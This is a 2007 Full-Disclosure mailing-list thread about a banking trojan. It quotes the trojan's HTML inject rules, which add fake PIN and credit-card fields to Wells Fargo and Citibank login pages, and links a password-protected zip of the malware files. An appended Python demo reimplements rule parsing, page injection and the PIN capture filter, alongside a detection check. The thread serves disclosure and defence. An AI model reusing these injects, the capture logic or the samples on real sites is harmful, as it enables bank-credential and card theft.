Why is this "genius" sending virus-infected attachments to the list? <br>The Trojan Horse Infostealer.Bancos.Z is attached to his "research data"... it steals passwords and logs keystrokes entered into certain financial Web sites.
<br><br><br><br><div><span class="gmail_quote">On 3/12/07, <b class="gmail_sendername">Thierry Zoller</b> <<a href="mailto:Thierry@zoller.lu">Thierry@zoller.lu</a>> wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
Dear list,<br><br>Whoever deals with these people and thinks they are a benign Adware<br>company (and thus spreads their bundles).<br><br>Check this:<br>Ignoring the fact that they basically install a Rootkit, I attached a
<br>few files I reversed, they install a DLL that does not directly KEYLOG your<br>banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking page<br>asking you to enter more details (like PIN, Magic Password etc), then
<br>capture that data and transmit it (I did no further investigation)<br><br><a href="http://secdev.zoller.lu/system32.zip">http://secdev.zoller.lu/system32.zip</a><br>Pass: 123<br><br>I am disgusted. They even created their own XML parser for this ...
<br><br>An extract of HTML code they inject :<br>-------------------------------------<br><inject<br>url="wellsfargo"<br>before="name=userid autocomplete='off'></DIV>"<br>what="
<br><DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT id=pin tabIndex=2 maxLength=4 type=password size=4 name=pin autocomplete='off'></SPAN></DIV>
<br>"<br>block="alt=Go"<br>check="pin"<br>quan="4"<br>content="d"<br>><br></inject><br>------------------------------------<br><br>Attached the main files (pass 123), feel free to add this as HIPS or whatever
<br>signatures, those interested in a complete reversal can contact me<br>to receive the EXE in question.<br><br>I have no more time, feel free to dig deeper.<br><br><br>I especially liked this:<br>------------------------
<br><inject<br>url="<a href="http://citibank.com">citibank.com</a>"<br><TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE='color:red'>To prevent fraud enter your credit card information please:</SPAN></TD></TR>
<br><br><br>Puke..<br><br>--<br><a href="http://secdev.zoller.lu">http://secdev.zoller.lu</a><br>Thierry Zoller<br><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html">
http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/">http://secunia.com/</a><br></blockquote></div><br>
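Added example (not from the post, and not code from the reversed files): a small Python reading of the rule format quoted above, applied to a constructed stand-in for a banking login page, plus the check a defender would run to spot the result. The interpretation of the attributes is my assumption from the sample alone: `url` is a substring match on the page URL, `before` is the anchor text after which `what` is inserted, and `check`/`quan`/`content="d"` name the field to harvest, its expected length, and "digits only". The sample rule and page below are constructed for the example.

```python
import re

# Constructed sample in the shape of the rule quoted in the post (not the real file).
SAMPLE_RULE = '''<inject
url="wellsfargo"
before="name=userid autocomplete='off'></DIV>"
what="
<DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT id=pin tabIndex=2 maxLength=4 type=password size=4 name=pin autocomplete='off'></SPAN></DIV>
"
block="alt=Go"
check="pin"
quan="4"
content="d"
>
</inject>'''

# Constructed stand-in for the genuine (server-sent) login page; only the anchor matters.
SAMPLE_PAGE = ("<FORM action='/login'><DIV><LABEL for=userid>Username</LABEL>:"
               "<INPUT id=userid type=text name=userid autocomplete='off'></DIV>"
               "<DIV><LABEL for=password>Password</LABEL>:"
               "<INPUT id=password type=password name=password></DIV>"
               "<INPUT type=image alt=Go src=go.gif></FORM>")

RULE_RE = re.compile(r'<inject\s+(.*?)\s*>\s*</inject>', re.DOTALL)
ATTR_RE = re.compile(r'(\w+)="([^"]*)"', re.DOTALL)   # values may span lines


def parse_rules(text):
    """Return one dict of attributes per <inject ...></inject> block."""
    return [dict(ATTR_RE.findall(body)) for body in RULE_RE.findall(text)]


def apply_rule(rule, url, html):
    """Assumed semantics: if rule['url'] is a substring of the page URL, insert
    rule['what'] right after the first occurrence of rule['before'].
    Returns (html, injected_flag)."""
    if rule.get('url', '') not in url:
        return html, False
    anchor = rule.get('before', '')
    pos = html.find(anchor)
    if not anchor or pos < 0:
        return html, False
    cut = pos + len(anchor)
    return html[:cut] + rule.get('what', '').strip() + html[cut:], True


def capture_ok(rule, form):
    """Assumed meaning of check/quan/content: the field named by 'check' must be
    present, 'quan' characters long and, for content 'd', all digits. This is the
    filter an exfiltration stage would apply before sending the value on."""
    value = form.get(rule.get('check', ''), '')
    if rule.get('quan') and len(value) != int(rule['quan']):
        return False
    if rule.get('content') == 'd' and not value.isdigit():
        return False
    return bool(value)


INPUT_RE = re.compile(r'<INPUT\b([^>]*)>', re.IGNORECASE)


def password_fields(html):
    """Names of all type=password inputs in a page, in document order."""
    names = []
    for attrs in INPUT_RE.findall(html):
        if re.search(r'type=["\']?password', attrs, re.IGNORECASE):
            m = re.search(r'name=["\']?(\w+)', attrs, re.IGNORECASE)
            names.append(m.group(1) if m else '')
    return names


def unexpected_fields(genuine_html, rendered_html):
    """Password inputs present in the rendered DOM but absent from what the server
    sent: the signature of this kind of in-browser HTML injection, which TLS
    cannot prevent because the DLL modifies the page after decryption."""
    return sorted(set(password_fields(rendered_html)) - set(password_fields(genuine_html)))


def demo():
    rule = parse_rules(SAMPLE_RULE)[0]
    html, hit = apply_rule(rule, 'https://online.wellsfargo.com/login', SAMPLE_PAGE)
    return hit, unexpected_fields(SAMPLE_PAGE, html), capture_ok(rule, {'pin': '1234'})


if __name__ == '__main__':
    print(demo())   # (True, ['pin'], True)
```

The detection half matters more than the injection half: the injected field sits inside the genuine, TLS-protected page, so the padlock and certificate are unchanged. Comparing the DOM the user sees against the HTML the server actually sent (or against a known field list for the login form) is what catches it, whether done from a browser extension or from a proxy capture during analysis.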